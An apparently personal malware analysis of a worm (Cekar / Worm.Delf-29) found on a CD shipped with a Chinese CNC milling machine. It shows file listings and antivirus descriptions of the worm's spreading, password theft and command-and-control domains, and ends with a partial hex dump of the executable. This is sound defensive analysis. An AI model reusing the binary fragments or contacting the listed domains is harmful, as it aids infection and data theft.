Hex dump of Gibe-F worm.

Hostile Data — Cekar / Worm.Delf-29

The source of the malware

Someone I know bought a CNC milling machine from a company in China, the Shandong Lunan Machine Tool Company, Ltd. Being a computer-controlled system, it came with a CD.

The CD included two copies of a piece of malware. Most of the CD content seems to be legitimate, the malware seems to be limited to one directory with the temping name "system software". I copied the CD file system to Linux and OpenBSD systems so I could safely access the hostile data using the far more useful tools available in those environments. The file system was copied with gcp -a on OpenBSD, preserving all file attributes. A long listing of the root of the CD file system shows the following:

total 280
dr-xr-xr-x 12 cromwell cromwell   4096 2011-06-10 03:53 .
drwxr-xr-x  3 cromwell cromwell   4096 2011-10-18 11:42 ..
dr-xr-xr-x  4 cromwell cromwell   4096 2009-12-15 02:50 GT150iMforATCtoolmagazinemachiningcentrewithCTBGAspindleservounit
dr-xr-xr-x  2 cromwell cromwell   4096 2009-12-15 03:01 GT150iMforumbrelamachiningcentrewithCTBGAspindleservounit
dr-xr-xr-x  2 cromwell cromwell   4096 2009-12-15 02:56 GT150iMgeneralmillingmachine
dr-xr-xr-x  2 cromwell cromwell   4096 2009-12-15 02:52 GT150iMgeneralmillingmachinematchingwithCTBGAspindleservounit
dr-xr-xr-x  3 cromwell cromwell   4096 2008-07-04 05:37 GT150iT for encoder
dr-xr-xr-x  3 cromwell cromwell   4096 2008-07-04 05:37 GT150iTforHydtoolturretswith8or10stations
dr-xr-xr-x  4 cromwell cromwell   4096 2011-06-10 04:02 GT150iTforHydtoolturretwith12stations
dr-xr-xr-x  3 cromwell cromwell   4096 2008-07-04 05:37 GT150iTforelectrictoolturretswith8stations+4gearlevelspindle
dr-xr-xr-x  3 cromwell cromwell   4096 2008-07-04 05:38 GT150iTforelectrictoolturretwith8stations
-r-xr-xr-x  1 cromwell cromwell 237568 2011-01-09 22:32 GTcom.exe
dr-xr-xr-x  3 cromwell cromwell   4096 2011-06-10 04:02 system software 

The directory holding the malware is significantly more recent than everything else on the CD file system, with the exception of the directory GT150iTforHydtoolturretwith12stations. They have identical timestamps at the granularity of the ls -l command. Looking closer with the stat command we see that they were changed within a fraction of a second:

% stat GT150iTforHydtoolturretwith12stations  system\ software
  File: `GT150iTforHydtoolturretwith12stations'
  Size: 4096            Blocks: 8          IO Block: 4096   directory
Device: 821h/2081d      Inode: 63307994    Links: 4
Access: (0555/dr-xr-xr-x)  Uid: (  501/cromwell)   Gid: (  501/cromwell)
Access: 2011-10-18 11:43:05.289949326 -0400
Modify: 2011-06-10 04:02:48.000000000 -0400
Change: 2011-10-18 11:42:54.904547052 -0400
   File: `system software'
   Size: 4096            Blocks: 8          IO Block: 4096   directory
Device: 821h/2081d      Inode: 63308166    Links: 3
Access: (0555/dr-xr-xr-x)  Uid: (  501/cromwell)   Gid: (  501/cromwell)
Access: 2011-10-18 11:43:05.290949268 -0400
Modify: 2011-06-10 04:02:48.000000000 -0400
Change: 2011-10-18 11:42:55.212529327 -0400 

The file in GT150iTforHydtoolturretwith12stations with the most recent time stamp has these attributes:

% stat GT150iTforHydtoolturretwith12stations/plc.lad
   File: `GT150iTforHydtoolturretwith12stations/plc.lad'
   Size: 16384           Blocks: 32         IO Block: 4096   regular file
Device: 821h/2081d      Inode: 63308075    Links: 1
Access: (0555/-r-xr-xr-x)  Uid: (  501/cromwell)   Gid: (  501/cromwell)
Access: 2011-10-18 11:43:15.081385781 -0400
Modify: 2008-10-22 08:31:30.000000000 -0400
Change: 2011-10-18 11:42:54.894547628 -0400 

None of that really proves anything, as time stamps can be manipulated.

The contaminated directory contains:

% tree system\ software
system software
|-- GTcom.rar
|-- PLCenglish.txt
|   `-- PLCenglish.exe.exe
`-- PLCenglish.txt.rar

1 directory, 3 files
% ls -laR system\ software
system software:
total 344
dr-xr-xr-x 3 cromwell cromwell   4096 2011-06-10 04:02 .
drwxr-xr-x 4 cromwell cromwell   4096 2011-10-18 12:14 ..
-r-xr-xr-x 1 cromwell cromwell 103806 2010-02-01 20:46 GTcom.rar
dr-xr-xr-x 2 cromwell cromwell   4096 2010-08-06 05:54 PLCenglish.txt
-r-xr-xr-x 1 cromwell cromwell 230314 2008-04-17 20:41 PLCenglish.txt.rar

system software/PLCenglish.txt:
total 528
dr-xr-xr-x 2 cromwell cromwell   4096 2010-08-06 05:54 .
dr-xr-xr-x 3 cromwell cromwell   4096 2011-06-10 04:02 ..
-r-xr-xr-x 1 cromwell cromwell 532480 2019-03-02 03:48 PLCenglish.exe.exe 

Extracting those RAR archives requires first changing the permission on the "system software" directory to allow writing. Then, the archive PLCenglish.txt.rar wants to create a new file named PLCenglish.txt but that already exists as the name of a directory. Changing the extracted file's name results in this:

% tree .
.
|-- GTcom.rar
|-- GTcom.txt
|-- PLCenglish.txt
|   `-- PLCenglish.exe.exe
|-- PLCenglish.txt-extracted
`-- PLCenglish.txt.rar

1 directory, 5 files
Linux:xena:~/Documents/chuck/system software % ls -laR
.:
total 1096
drwxr-xr-x 3 cromwell cromwell   4096 2011-10-18 12:17 .
drwxr-xr-x 4 cromwell cromwell   4096 2011-10-18 12:14 ..
-r-xr-xr-x 1 cromwell cromwell 103806 2010-02-01 20:46 GTcom.rar
-rw-r--r-- 1 cromwell cromwell 237568 2007-08-04 10:33 GTcom.txt
dr-xr-xr-x 2 cromwell cromwell   4096 2010-08-06 05:54 PLCenglish.txt
-rw-r--r-- 1 cromwell cromwell 532480 2019-03-02 16:48 PLCenglish.txt-extracted
-r-xr-xr-x 1 cromwell cromwell 230314 2008-04-17 20:41 PLCenglish.txt.rar

./PLCenglish.txt:
total 528
dr-xr-xr-x 2 cromwell cromwell   4096 2010-08-06 05:54 .
drwxr-xr-x 3 cromwell cromwell   4096 2011-10-18 12:17 ..
-r-xr-xr-x 1 cromwell cromwell 532480 2019-03-02 03:48 PLCenglish.exe.exe 

The executable contents

GNU utilities such as file, strings, and hexdump are useful for getting some limited idea about what this malicious code might do. The file utility reports that these files are:

GTcom.rar RAR archive data, v1d, os: Win32
GTcom.txt PE32 executable for MS Windows (GUI) Intel 80386 32-bit
PLCenglish.txt PE32 executable for MS Windows (GUI) Intel 80386 32-bit
PLCenglish.txt.rar RAR archive data, v1d, os: Win32

Notice that the two files with names ending ".txt" are in fact executables. McAfee detected PLCenglish.txt as the Cekar malware. McAfee describes Cekar as a file infecting worm. It searches for executable files on the infected machine, removable media and mounted network drives to append its viral code. It also monitors and steals passwords from QQ, a popular Instant Messenging application in China.

When executed, it drops a copy of its propagation component into one of either %Windir%\system\internat.exe of %Windir%\system\conime.exe (where %Windir% is the Windows directory, typically c:\Windows).

It then tries to copy itself to the root of all available local drives and network shares as \autorun.inf and \setup.exe.

It then attempts to contact these sites to upload stolen data and download further malware: tx.993311.com, mm.21380.com, 5y5.us, and 35561.com. Downloaded further malware is stored in %Windir%\System\System32.vxd and the list of files accessed across network shares may be stored in %Windir%\System\MCIWACE.INC.

However, ClamAV labels the same file as Worm.Delf-29, which seems to be rather different. See the Bitdefender page for their details of a Worm.Delf variant.

The following is partial output for running
  hexdump -C PLCenglish.txt
under Linux or BSD.

I don't know what this thing is. Notice all the references to the mouse and the scroll wheel and other things that seem unreleated to typical malware. Also notice the lack of calls to the TCP/IP system calls.

If only one malware detection package said this was malware, I would think it might be a false positive. But with the strange naming (executable files with *.txt names!) and clumsy archiving, it doesn't seem at all legitimate.

00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..........⚠⚠..|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |⚠.......@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 f0 00 00 00  |............⚠...|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |..⚠..⚠.⚠!⚠.L⚠!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  5c 9a be 9e 18 fb d0 cd  18 fb d0 cd 18 fb d0 cd  |\.⚠..⚠⚠⚠.⚠⚠⚠.⚠⚠⚠|
00000090  4e e4 c3 cd 3d fb d0 cd  18 fb d0 cd 37 fb d0 cd  |N⚠⚠⚠=⚠⚠⚠.⚠⚠⚠7⚠⚠⚠|
000000a0  7a e4 c3 cd 0b fb d0 cd  18 fb d1 cd e8 fa d0 cd  |z⚠⚠⚠.⚠⚠⚠.⚠⚠⚠⚠⚠⚠⚠|
000000b0  9b e7 de cd 05 fb d0 cd  f0 e4 da cd 8f fb d0 cd  |.⚠⚠⚠.⚠⚠⚠⚠⚠⚠⚠.⚠⚠⚠|
000000c0  f0 e4 db cd 6f fb d0 cd  a0 fd d6 cd 19 fb d0 cd  |⚠⚠⚠⚠o⚠⚠⚠⚠⚠⚠⚠.⚠⚠⚠|
000000d0  52 69 63 68 18 fb d0 cd  00 00 00 00 00 00 00 00  |Rich.⚠⚠⚠........|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  50 45 00 00 4c 01 04 00  09 ac e0 46 00 00 00 00  |PE..L....⚠⚠F....|
00000100  00 00 00 00 e0 00 0f 01  0b 01 06 00 00 d0 05 00  |....⚠........⚠..|
00000110  00 d0 03 00 00 00 00 00  df ce 01 00 00 10 00 00  |.⚠......⚠⚠......|
00000120  00 e0 05 00 00 00 40 00  00 10 00 00 00 10 00 00  |.⚠....@.........|
00000130  04 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00000140  00 b0 09 00 00 10 00 00  00 00 00 00 02 00 00 00  |.⚠..............|
00000150  00 00 10 00 00 10 00 00  00 00 10 00 00 10 00 00  |................|
[....]
0005f880  00 00 00 00 00 00 00 00  0a 00 00 00 06 82 43 00  |..............C.|
0005f890  00 c0 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.⚠..............|
0005f8a0  ec 2d 49 00 4f 82 43 00  00 00 00 00 00 00 00 00  |⚠-I.O.C.........|
0005f8b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
0005f8c0  41 66 78 4f 6c 64 57 6e  64 50 72 6f 63 34 32 33  |AfxOldWndProc423|
0005f8d0  00 00 00 00 41 66 78 57  6e 64 34 32 73 00 00 00  |....AfxWnd42s...|
0005f8e0  41 66 78 43 6f 6e 74 72  6f 6c 42 61 72 34 32 73  |AfxControlBar42s|
0005f8f0  00 00 00 00 41 66 78 4d  44 49 46 72 61 6d 65 34  |....AfxMDIFrame4|
0005f900  32 73 00 00 41 66 78 46  72 61 6d 65 4f 72 56 69  |2s..AfxFrameOrVi|
0005f910  65 77 34 32 73 00 00 00  41 66 78 4f 6c 65 43 6f  |ew42s...AfxOleCo|
0005f920  6e 74 72 6f 6c 34 32 73  00 00 00 00 47 65 74 4d  |ntrol42s....GetM|
0005f930  6f 6e 69 74 6f 72 49 6e  66 6f 41 00 45 6e 75 6d  |onitorInfoA.Enum|
0005f940  44 69 73 70 6c 61 79 4d  6f 6e 69 74 6f 72 73 00  |DisplayMonitors.|
0005f950  4d 6f 6e 69 74 6f 72 46  72 6f 6d 50 6f 69 6e 74  |MonitorFromPoint|
0005f960  00 00 00 00 4d 6f 6e 69  74 6f 72 46 72 6f 6d 52  |....MonitorFromR|
0005f970  65 63 74 00 4d 6f 6e 69  74 6f 72 46 72 6f 6d 57  |ect.MonitorFromW|
0005f980  69 6e 64 6f 77 00 00 00  47 65 74 53 79 73 74 65  |indow...GetSyste|
0005f990  6d 4d 65 74 72 69 63 73  00 00 00 00 55 53 45 52  |mMetrics....USER|
0005f9a0  33 32 00 00 44 49 53 50  4c 41 59 00 63 6f 6d 6d  |32..DISPLAY.comm|
0005f9b0  63 74 72 6c 5f 44 72 61  67 4c 69 73 74 4d 73 67  |ctrl_DragListMsg|
0005f9c0  00 00 00 00 c8 63 46 00  fb e1 44 00 85 5a 43 00  |....⚠cF.⚠⚠D..ZC.|
0005f9d0  00 16 40 00 e5 96 43 00  eb 66 43 00 f4 97 43 00  |..@.⚠.C.⚠fC.⚠.C.|
[....]
0005fa90  3a 25 78 3a 25 78 00 00  41 66 78 3a 25 78 3a 25  |:%x:%x..Afx:%x:%|
0005faa0  78 00 00 00 30 64 46 00  14 74 43 00 25 74 43 00  |x...0dF..tC.%tC.|
0005fab0  28 74 43 00 2b 74 43 00  49 6e 69 74 43 6f 6d 6d  |(tC.+tC.InitComm|
0005fac0  6f 6e 43 6f 6e 74 72 6f  6c 73 45 78 00 00 00 00  |onControlsEx....|
0005fad0  43 4f 4d 43 54 4c 33 32  2e 44 4c 4c 00 00 00 00  |COMCTL32.DLL....|
0005fae0  88 64 46 00 66 e2 44 00  41 e2 44 00 00 16 40 00  |.dF.f⚠D.A⚠D...@.|
0005faf0  e5 96 43 00 eb 66 43 00  f4 97 43 00 fa 97 43 00  |⚠.C.⚠fC.⚠.C.⚠.C.|
[....]
0005fb90  79 86 43 00 d2 8d 43 00  5e 8a 43 00 f0 64 46 00  |y.C.⚠.C.^.C.⚠dF.|
0005fba0  26 e3 44 00 00 00 00 00  c0 fb 45 00 1c 00 00 00  |&⚠D.....⚠⚠E.....|
0005fbb0  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
0005fbc0  43 43 6d 64 54 61 72 67  65 74 00 00 06 0f 0f 0f  |CCmdTarget......|
0005fbd0  06 00 00 00 00 00 00 00  00 00 00 00 e0 fb 45 00  |............⚠⚠E.|
0005fbe0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
0005fcb0  ff ff ff ff 25 75 00 00  25 68 64 00 25 73 64 00  |⚠⚠⚠⚠%u..%hd.%sd.|
0005fcc0  25 6c 64 00 25 6c 75 00  e0 fc 45 00 08 00 00 00  |%ld.%lu.⚠⚠E.....|
0005fcd0  ff ff 00 00 5b e5 44 00  d8 fd 45 00 00 00 00 00  |⚠⚠..[⚠D.⚠⚠E.....|
0005fce0  43 54 65 6d 70 47 64 69  4f 62 6a 65 63 74 00 00  |CTempGdiObject..|
0005fcf0  08 fd 45 00 10 00 00 00  ff ff 00 00 0a e5 44 00  |.⚠E.....⚠⚠...⚠D.|
0005fd00  78 fe 45 00 00 00 00 00  43 54 65 6d 70 44 43 00  |x⚠E.....CTempDC.|
0005fd10  28 fd 45 00 08 00 00 00  ff ff 00 00 00 00 00 00  |(⚠E.....⚠⚠......|
0005fd20  d8 fd 45 00 00 00 00 00  43 52 67 6e 00 00 00 00  |⚠⚠E.....CRgn....|
0005fd30  48 fd 45 00 08 00 00 00  ff ff 00 00 00 00 00 00  |H⚠E.....⚠⚠......|
0005fd40  d8 fd 45 00 00 00 00 00  43 50 61 6c 65 74 74 65  |⚠⚠E.....CPalette|
0005fd50  00 00 00 00 00 00 00 00  70 fd 45 00 08 00 00 00  |........p⚠E.....|
0005fd60  ff ff 00 00 00 00 00 00  d8 fd 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
0005fd70  43 42 69 74 6d 61 70 00  90 fd 45 00 08 00 00 00  |CBitmap..⚠E.....|
0005fd80  ff ff 00 00 00 00 00 00  d8 fd 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
0005fd90  43 46 6f 6e 74 00 00 00  b0 fd 45 00 08 00 00 00  |CFont...⚠⚠E.....|
0005fda0  ff ff 00 00 00 00 00 00  d8 fd 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
0005fdb0  43 42 72 75 73 68 00 00  d0 fd 45 00 08 00 00 00  |CBrush..⚠⚠E.....|
0005fdc0  ff ff 00 00 00 00 00 00  d8 fd 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
0005fdd0  43 50 65 6e 00 00 00 00  f0 fd 45 00 08 00 00 00  |CPen....⚠⚠E.....|
0005fde0  ff ff 00 00 c6 e4 44 00  f0 14 46 00 00 00 00 00  |⚠⚠..⚠⚠D.⚠.F.....|
0005fdf0  43 47 64 69 4f 62 6a 65  63 74 00 00 00 00 00 00  |CGdiObject......|
0005fe00  18 fe 45 00 54 00 00 00  ff ff 00 00 00 00 00 00  |.⚠E.T...⚠⚠......|
0005fe10  78 fe 45 00 00 00 00 00  43 50 61 69 6e 74 44 43  |x⚠E.....CPaintDC|
0005fe20  00 00 00 00 00 00 00 00  40 fe 45 00 14 00 00 00  |........@⚠E.....|
0005fe30  ff ff 00 00 00 00 00 00  78 fe 45 00 00 00 00 00  |⚠⚠......x⚠E.....|
0005fe40  43 57 69 6e 64 6f 77 44  43 00 00 00 00 00 00 00  |CWindowDC.......|
0005fe50  68 fe 45 00 14 00 00 00  ff ff 00 00 00 00 00 00  |h⚠E.....⚠⚠......|
0005fe60  78 fe 45 00 00 00 00 00  43 43 6c 69 65 6e 74 44  |x⚠E.....CClientD|
0005fe70  43 00 00 00 00 00 00 00  90 fe 45 00 10 00 00 00  |C........⚠E.....|
0005fe80  ff ff 00 00 97 e4 44 00  f0 14 46 00 00 00 00 00  |⚠⚠...⚠D.⚠.F.....|
0005fe90  43 44 43 00 00 00 00 00  b0 fe 45 00 98 00 00 00  |CDC.....⚠⚠E.....|
0005fea0  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
0005feb0  43 55 73 65 72 45 78 63  65 70 74 69 6f 6e 00 00  |CUserException..|
0005fec0  d8 fe 45 00 98 00 00 00  ff ff 00 00 00 00 00 00  |⚠⚠E.....⚠⚠......|
0005fed0  78 1e 46 00 00 00 00 00  43 52 65 73 6f 75 72 63  |x.F.....CResourc|
0005fee0  65 45 78 63 65 70 74 69  6f 6e 00 00 70 65 46 00  |eException..peF.|
0005fef0  ae e4 44 00 8b da 43 00  00 16 40 00 e2 db 43 00  |⚠⚠D..⚠C...@.⚠⚠C.|
0005ff00  ec db 43 00 f6 db 43 00  fb db 43 00 38 dc 43 00  |⚠⚠C.⚠⚠C.⚠⚠C.8⚠C.|
0005ff10  69 dc 43 00 be dc 43 00  86 dd 43 00 33 de 43 00  |i⚠C.⚠⚠C..⚠C.3⚠C.|
0005ff20  1a df 43 00 49 df 43 00  77 df 43 00 c3 df 43 00  |.⚠C.I⚠C.w⚠C.⚠⚠C.|
0005ff30  0f e0 43 00 5b e0 43 00  4b e1 43 00 97 e1 43 00  |.⚠C.[⚠C.K⚠C..⚠C.|
0005ff40  ef e1 43 00 33 16 41 00  47 16 41 00 57 16 41 00  |⚠⚠C.3.A.G.A.W.A.|
0005ff50  73 16 41 00 98 16 41 00  d0 16 41 00 ec 16 41 00  |s.A...A.⚠.A.⚠.A.|
0005ff60  1c 17 41 00 47 65 74 4c  61 79 6f 75 74 00 00 00  |..A.GetLayout...|
0005ff70  47 44 49 33 32 2e 44 4c  4c 00 00 00 53 65 74 4c  |GDI32.DLL...SetL|
0005ff80  61 79 6f 75 74 00 00 00  c0 65 46 00 b4 e4 44 00  |ayout...⚠eF.⚠⚠D.|
0005ff90  c3 eb 43 00 00 16 40 00  e2 db 43 00 ec db 43 00  |⚠⚠C...@.⚠⚠C.⚠⚠C.|
0005ffa0  f6 db 43 00 fb db 43 00  38 dc 43 00 69 dc 43 00  |⚠⚠C.⚠⚠C.8⚠C.i⚠C.|
[....]
000601d0  0a 17 43 00 4a b2 43 00  f0 01 46 00 78 00 00 00  |..C.J⚠C.⚠.F.x...|
000601e0  ff ff 00 00 00 00 00 00  f8 f5 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
000601f0  43 43 6f 6e 74 72 6f 6c  42 61 72 00 00 00 00 00  |CControlBar.....|
00060200  18 02 46 00 40 00 00 00  ff ff 00 00 00 00 00 00  |..F.@...⚠⚠......|
00060210  f8 f5 45 00 00 00 00 00  43 56 69 65 77 00 00 00  |⚠⚠E.....CView...|
00060220  38 02 46 00 bc 00 00 00  ff ff 00 00 46 e6 44 00  |8.F.⚠...⚠⚠..F⚠D.|
00060230  f8 f5 45 00 00 00 00 00  43 46 72 61 6d 65 57 6e  |⚠⚠E.....CFrameWn|
00060240  64 00 00 00 00 00 00 00  18 f6 45 00 50 02 46 00  |d........⚠E.P.F.|
00060250  16 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
00060690  00 00 00 00 00 00 00 00  98 2f 49 00 e8 c0 44 00  |........./I.⚠⚠D.|
000606a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000606b0  00 00 00 00 00 00 00 00  4d 53 57 48 45 45 4c 5f  |........MSWHEEL_|
000606c0  52 4f 4c 4c 4d 53 47 00  28 69 46 00 7b e6 44 00  |ROLLMSG.(iF.{⚠D.|
000606d0  14 a1 44 00 00 16 40 00  8e ad 44 00 eb 66 43 00  |.⚠D...@..⚠D.⚠fC.|
000606e0  f4 97 43 00 fa 97 43 00  ff 97 43 00 02 98 43 00  |⚠.C.⚠.C.⚠.C...C.|
[....]
000607c0  20 2d 20 00 3a 25 64 00  e0 07 46 00 88 00 00 00  | - .:%d.⚠.F.....|
000607d0  ff ff 00 00 00 00 00 00  d8 01 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
000607e0  43 44 69 61 6c 6f 67 42  61 72 00 00 00 00 00 00  |CDialogBar......|
000607f0  a0 1f 46 00 f8 07 46 00  10 01 00 00 00 00 00 00  |⚠.F.⚠.F.........|
00060800  00 00 00 00 00 00 00 00  0a 00 00 00 81 48 44 00  |.............HD.|
[....]
00060900  12 0f 45 00 df 7e 44 00  d8 74 44 00 00 00 00 00  |..E.⚠~D.⚠tD.....|
00060910  28 09 46 00 9c 00 00 00  ff ff 00 00 00 00 00 00  |(.F.....⚠⚠......|
00060920  d8 01 46 00 00 00 00 00  43 54 6f 6f 6c 42 61 72  |⚠.F.....CToolBar|
00060930  00 00 00 00 00 00 00 00  a0 1f 46 00 40 09 46 00  |........⚠.F.@.F.|
00060940  84 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
00060a70  00 00 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00060a80  80 80 80 00 10 00 00 00  c0 c0 c0 00 0f 00 00 00  |........⚠⚠⚠.....|
00060a90  ff ff ff 00 14 00 00 00  44 6c 6c 47 65 74 56 65  |⚠⚠⚠.....DllGetVe|
00060aa0  72 73 69 6f 6e 00 00 00  4d 61 72 6c 65 74 74 00  |rsion...Marlett.|
00060ab0  f0 69 46 00 ba ed 44 00  14 e8 44 00 00 16 40 00  |⚠iF.⚠⚠D..⚠D...@.|
00060ac0  e5 96 43 00 eb 66 43 00  f4 97 43 00 fa 97 43 00  |⚠.C.⚠fC.⚠.C.⚠.C.|
[....]
00060b70  4c 53 44 00 b3 59 44 00  8d 7e 44 00 c1 7e 44 00  |LSD.⚠YD..~D.⚠~D.|
00060b80  e8 7c 44 00 2f 73 44 00  96 57 44 00 df 7e 44 00  |⚠|D./sD..WD.⚠~D.|
00060b90  d8 74 44 00 75 4b 44 00  54 6f 6f 6c 62 61 72 57  |⚠tD.uKD.ToolbarW|
00060ba0  69 6e 64 6f 77 33 32 00  40 6a 46 00 30 59 44 00  |indow32.@jF.0YD.|
00060bb0  6e 59 44 00 d7 99 43 00  b0 59 44 00 1b e8 00 00  |nYD.⚠.C.⚠YD..⚠..|
00060bc0  00 28 00 00 1e e8 00 00  00 82 00 00 1c e8 00 00  |.(...⚠.......⚠..|
00060bd0  00 14 00 00 1d e8 00 00  00 41 00 00 00 00 00 00  |.....⚠...A......|
00060be0  f8 0b 46 00 70 01 00 00  ff ff 00 00 c6 ed 44 00  |⚠.F.p...⚠⚠..⚠⚠D.|
00060bf0  98 21 46 00 00 00 00 00  43 4d 69 6e 69 44 6f 63  |.!F.....CMiniDoc|
00060c00  6b 46 72 61 6d 65 57 6e  64 00 00 00 00 00 00 00  |kFrameWnd.......|
00060c10  28 0c 46 00 a4 00 00 00  ff ff 00 00 00 00 00 00  |(.F.⚠...⚠⚠......|
00060c20  d8 01 46 00 00 00 00 00  43 44 6f 63 6b 42 61 72  |⚠.F.....CDockBar|
00060c30  00 00 00 00 00 00 00 00  c0 21 46 00 40 0c 46 00  |........⚠!F.@.F.|
00060c40  10 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
00060f30  42 6a 44 00 00 00 00 00  50 0f 46 00 f8 01 00 00  |BjD.....P.F.⚠...|
00060f40  ff ff 00 00 00 00 00 00  c8 f3 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00060f50  43 46 69 6c 65 44 69 61  6c 6f 67 00 88 6b 46 00  |CFileDialog..kF.|
00060f60  01 ee 44 00 74 0e 43 00  00 16 40 00 dd 4f 43 00  |.⚠D.t.C...@.⚠OC.|
00060f70  eb 66 43 00 f4 97 43 00  fa 97 43 00 ff 97 43 00  |⚠fC.⚠.C.⚠.C.⚠.C.|
[....]
00061040  00 16 43 00 01 16 43 00  02 16 43 00 00 00 00 00  |..C...C...C.....|
00061050  68 10 46 00 c0 00 00 00  ff ff 00 00 00 00 00 00  |h.F.⚠...⚠⚠......|
00061060  08 12 46 00 00 00 00 00  43 57 69 6e 41 70 70 00  |..F.....CWinApp.|
00061070  d8 fb 45 00 78 10 46 00  11 01 00 00 00 00 00 00  |⚠⚠E.x.F.........|
00061080  41 e1 00 00 41 e1 00 00  0c 00 00 00 70 f0 43 00  |A⚠..A⚠......p⚠C.|
00061090  11 01 00 00 ff ff ff ff  10 e1 00 00 10 e1 00 00  |....⚠⚠⚠⚠.⚠...⚠..|
000610a0  2c 00 00 00 12 6e 44 00  11 01 00 00 00 00 00 00  |,....nD.........|
000610b0  10 e1 00 00 1f e1 00 00  02 00 00 00 4e 6e 44 00  |.⚠...⚠......NnD.|
000610c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000610d0  00 00 00 00 00 00 00 00  50 72 65 76 69 65 77 50  |........PreviewP|
000610e0  61 67 65 73 00 00 00 00  53 65 74 74 69 6e 67 73  |ages....Settings|
000610f0  00 00 00 00 46 69 6c 65  25 64 00 00 52 65 63 65  |....File%d..Rece|
00061100  6e 74 20 46 69 6c 65 20  4c 69 73 74 00 00 00 00  |nt File List....|
00061110  d8 6b 46 00 10 ee 44 00  48 6c 46 00 f8 f3 44 00  |⚠kF..⚠D.HlF.⚠⚠D.|
00061120  15 ef 44 00 00 16 40 00  e5 96 43 00 64 98 43 00  |.⚠D...@.⚠.C.d.C.|
00061130  f4 97 43 00 fa 97 43 00  ff 97 43 00 02 98 43 00  |⚠.C.⚠.C.⚠.C...C.|
00061140  05 98 43 00 7b a4 43 00  af 98 43 00 52 98 43 00  |..C.{⚠C.⚠.C.R.C.|
00061150  9f 98 43 00 5e 98 43 00  58 98 43 00 96 98 43 00  |..C.^.C.X.C...C.|
00061160  9a 98 43 00 aa 98 43 00  a5 98 43 00 71 ef 44 00  |..C.⚠.C.⚠.C.q⚠D.|
00061170  81 a4 43 00 f8 ac 43 00  ad af 43 00 51 a5 43 00  |.⚠C.⚠⚠C.⚠⚠C.Q⚠C.|
00061180  09 ab 43 00 c2 f3 44 00  da a4 43 00 48 ae 43 00  |.⚠C.⚠⚠D.⚠⚠C.H⚠C.|
00061190  92 af 43 00 75 aa 43 00  ea 6d 44 00 d4 6d 44 00  |.⚠C.u⚠C.⚠mD.⚠mD.|
000611a0  31 ef 44 00 c1 6d 44 00  94 3d 44 00 62 6d 44 00  |1⚠D.⚠mD..=D.bmD.|
000611b0  34 6e 44 00 a3 a4 43 00  98 6c 46 00 ed af 43 00  |4nD.⚠⚠C..lF.⚠⚠C.|
000611c0  83 f0 44 00 00 16 40 00  f6 f0 44 00 41 75 74 6f  |.⚠D...@.⚠⚠D.Auto|
000611d0  6d 61 74 69 6f 6e 00 00  45 6d 62 65 64 64 69 6e  |mation..Embeddin|
000611e0  67 00 00 00 64 64 65 00  55 6e 72 65 67 73 65 72  |g...dde.Unregser|
000611f0  76 65 72 00 55 6e 72 65  67 69 73 74 65 72 00 00  |ver.Unregister..|
00061200  70 00 00 00 70 74 00 00  20 12 46 00 68 00 00 00  |p...pt.. .F.h...|
00061210  ff ff 00 00 00 00 00 00  a8 fb 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00061220  43 57 69 6e 54 68 72 65  61 64 00 00 d0 6c 46 00  |CWinThread..⚠lF.|
00061230  f3 f4 44 00 68 f4 44 00  00 16 40 00 e5 96 43 00  |⚠⚠D.h⚠D...@.⚠.C.|
00061240  64 98 43 00 f4 97 43 00  fa 97 43 00 ff 97 43 00  |d.C.⚠.C.⚠.C.⚠.C.|
00061250  02 98 43 00 05 98 43 00  4c 98 43 00 af 98 43 00  |..C...C.L.C.⚠.C.|
00061260  52 98 43 00 9f 98 43 00  5e 98 43 00 58 98 43 00  |R.C...C.^.C.X.C.|
00061270  96 98 43 00 9a 98 43 00  aa 98 43 00 a5 98 43 00  |..C...C.⚠.C.⚠.C.|
00061280  87 aa 43 00 8a aa 43 00  f8 ac 43 00 ad af 43 00  |.⚠C..⚠C.⚠⚠C.⚠⚠C.|
00061290  66 ab 43 00 09 ab 43 00  62 ab 43 00 55 ad 43 00  |f⚠C..⚠C.b⚠C.U⚠C.|
000612a0  48 ae 43 00 92 af 43 00  75 aa 43 00 20 6d 46 00  |H⚠C..⚠C.u⚠C. mF.|
000612b0  0e f5 44 00 5c 00 00 00  53 6f 66 74 77 61 72 65  |.⚠D.\...Software|
000612c0  5c 00 00 00 73 79 73 74  65 6d 00 00 00 00 00 00  |\...system......|
000612d0  e8 12 46 00 68 00 00 00  ff ff 00 00 00 00 00 00  |⚠.F.h...⚠⚠......|
